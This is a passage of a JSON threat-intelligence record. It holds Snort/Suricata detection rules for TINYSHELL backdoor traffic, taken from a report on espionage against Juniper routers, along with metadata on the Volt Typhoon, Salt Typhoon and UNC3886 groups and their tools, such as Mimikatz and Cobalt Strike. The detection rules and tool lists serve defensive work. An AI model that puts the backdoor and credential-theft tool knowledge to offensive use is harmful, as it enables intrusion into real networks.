condition:\r\n all of ($tshd_*) or all of ($tsh_*)\r\n}\r\nSnort/Suricata Rules\r\nalert udp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_deadbeef_1\"; dsize:\u003e15; content:\"|44 31 3A 14 45 95 6A 73|\"; offset: 0; depth:8; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1; )\r\nalert udp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_deadbeef_2\"; dsize:\u003e15; content:\"|64 11 1A 34 65 B5 4A 53|\"; offset: 0; depth:8; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1; )\r\nalert icmp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_uSarguuS62bKRA0J\"; content:\"|f3 d5 e7 f4 e1 f3 f3 d5 b0 b4 e4 cd d4 c7 b6 cc|\"; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1; )\r\nalert udp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_0b3330c0b41d1ae2\"; dsize:\u003e27; content:\"|c5 c4 ec 4d|\"; offset: 0; depth:4; content:\"|a6 04 ed 83 92 46 ce 40 9a 34 8c 7b 5a d6 e5 0d|\"; offset:12; depth:16; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1; )\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/"
	],
	"report_names": [
		"china-nexus-espionage-targets-juniper-routers"
	],
	"threat_actors": [
		{
			"id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7",
			"created_at": "2023-06-23T02:04:34.793629Z",
			"updated_at": "2026-04-10T02:00:04.971054Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Bronze Silhouette",
				"Dev-0391",
				"Insidious Taurus",
				"Redfly",
				"Storm-0391",
				"UAT-5918",
				"UAT-7237",
				"UNC3236",
				"VOLTZITE",
				"Vanguard Panda"
			],
			"source_name": "ETDA:Volt Typhoon",
			"tools": [
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f0eca237-f191-448f-87d1-5d6b3651cbff",
			"created_at": "2024-02-06T02:00:04.140087Z",
			"updated_at": "2026-04-10T02:00:03.577326Z",
			"deleted_at": null,
			"main_name": "GhostEmperor",
			"aliases": [
				"OPERATOR PANDA",
				"FamousSparrow",
				"UNC2286",
				"Salt Typhoon",
				"RedMike"
			],
			"source_name": "MISPGALAXY:GhostEmperor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9df8987a-27fc-45c5-83b0-20dceb8288af",
			"created_at": "2025-10-29T02:00:51.836932Z",
			"updated_at": "2026-04-10T02:00:05.253487Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [
				"UNC3886"
			],
			"source_name": "MITRE:UNC3886",
			"tools": [
				"MOPSLED",
				"VIRTUALPIE",
				"CASTLETAP",
				"THINCRUST",
				"VIRTUALPITA",
				"RIFLESPINE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a08d93aa-41e4-4eca-a0fd-002d051a2c2d",
			"created_at": "2024-08-28T02:02:09.711951Z",
			"updated_at": "2026-04-10T02:00:04.957678Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [
				"Fire Ant"
			],
			"source_name": "ETDA:UNC3886",
			"tools": [
				"BOLDMOVE",
				"CASTLETAP",
				"LOOKOVER",
				"MOPSLED",
				"RIFLESPINE",
				"TABLEFLIP",
				"THINCRUST",
				"Tiny SHell",
				"VIRTUALGATE",
				"VIRTUALPIE",
				"VIRTUALPITA",
				"VIRTUALSHINE",
				"tsh"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1c91699d-77d3-4ad7-9857-9f9196ac1e37",
			"created_at": "2023-11-04T02:00:07.663664Z",
			"updated_at": "2026-04-10T02:00:03.385989Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3886",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff",
			"created_at": "2024-12-28T02:01:54.899899Z",
			"updated_at": "2026-04-10T02:00:04.880446Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Earth Estries",
				"FamousSparrow",
				"GhostEmperor",
				"Operator Panda",
				"RedMike",
				"Salt Typhoon",
				"UNC2286"
			],
			"source_name": "ETDA:Salt Typhoon",
			"tools": [
				"Agentemis",
				"Backdr-NQ",
				"Cobalt Strike",
				"CobaltStrike",
				"Crowdoor",
				"Cryptmerlin",
				"Deed RAT",
				"Demodex",
				"FamousSparrow",
				"FuxosDoor",
				"GHOSTSPIDER",
				"HemiGate",
				"MASOL RAT",
				"Mimikatz",
				"NBTscan",
				"NinjaCopy",
				"ProcDump",
				"PsExec",
				"PsList",
				"SnappyBee",
				"SparrowDoor",
				"TrillClient",
				"WinRAR",
				"Zingdoor",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a88747e2-ffed-45d8-b847-8464361b2254",
			"created_at": "2023-11-01T02:01:06.605663Z",
			"updated_at": "2026-04-10T02:00:05.289908Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Volt Typhoon",
				"BRONZE SILHOUETTE",
				"Vanguard Panda",
				"DEV-0391",
				"UNC3236",
				"Voltzite",
				"Insidious Taurus"
			],
			"source_name": "MITRE:Volt Typhoon",
			"tools": [
				"netsh",
				"PsExec",
				"ipconfig",
				"Wevtutil",
				"VersaMem",
				"Tasklist",
				"Mimikatz",
				"Impacket",
				"Systeminfo",
				"netstat",
				"Nltest",
				"certutil",
				"FRP",
				"cmd"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "49b3063e-a96c-4a43-b28b-1c380ae6a64b",
			"created_at": "2025-08-07T02:03:24.661509Z",
			"updated_at": "2026-04-10T02:00:03.644548Z",
			"deleted_at": null,
			"main_name": "BRONZE SILHOUETTE",
			"aliases": [
				"Dev-0391 ",
				"Insidious Taurus ",
				"UNC3236 ",
				"Vanguard Panda ",
				"Volt Typhoon ",
				"Voltzite "
			],
			"source_name": "Secureworks:BRONZE SILHOUETTE",
			"tools": [
				"Living-off-the-land binaries",
				"Web shells"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fcff864b-9255-49cf-9d9b-2b9cb2ad7cff",
			"created_at": "2025-04-23T02:00:55.190165Z",
			"updated_at": "2026-04-10T02:00:05.361244Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Salt Typhoon"
			],
			"source_name": "MITRE:Salt Typhoon",
			"tools": [
				"JumbledPath"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6477a057-a76b-4b60-9135-b21ee075ca40",
			"created_at": "2025-11-01T02:04:53.060656Z",
			"updated_at": "2026-04-10T02:00:03.845594Z",
			"deleted_at": null,
			"main_name": "BRONZE TIGER",
			"aliases": [
				"Earth Estries ",
				"Famous Sparrow ",
				"Ghost Emperor ",
				"RedMike ",
				"Salt Typhoon "
			],
			"source_name": "Secureworks:BRONZE TIGER",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4ed2b20c-7523-4852-833b-cebee8029f55",
			"created_at": "2023-05-26T02:02:03.524749Z",
			"updated_at": "2026-04-10T02:00:03.366175Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"BRONZE SILHOUETTE",
				"VANGUARD PANDA",
				"UNC3236",
				"Insidious Taurus",
				"VOLTZITE",
				"Dev-0391",
				"Storm-0391"
			],
			"source_name": "MISPGALAXY:Volt Typhoon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434130,
	"ts_updated_at": 1775826756,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/99fd1cb12fde3916c86c1226af85a5d816145c8d.pdf",
		"text": "https://archive.orkl.eu/99fd1cb12fde3916c86c1226af85a5d816145c8d.txt",
		"img": "https://archive.orkl.eu/99fd1cb12fde3916c86c1226af85a5d816145c8d.jpg"
	}
}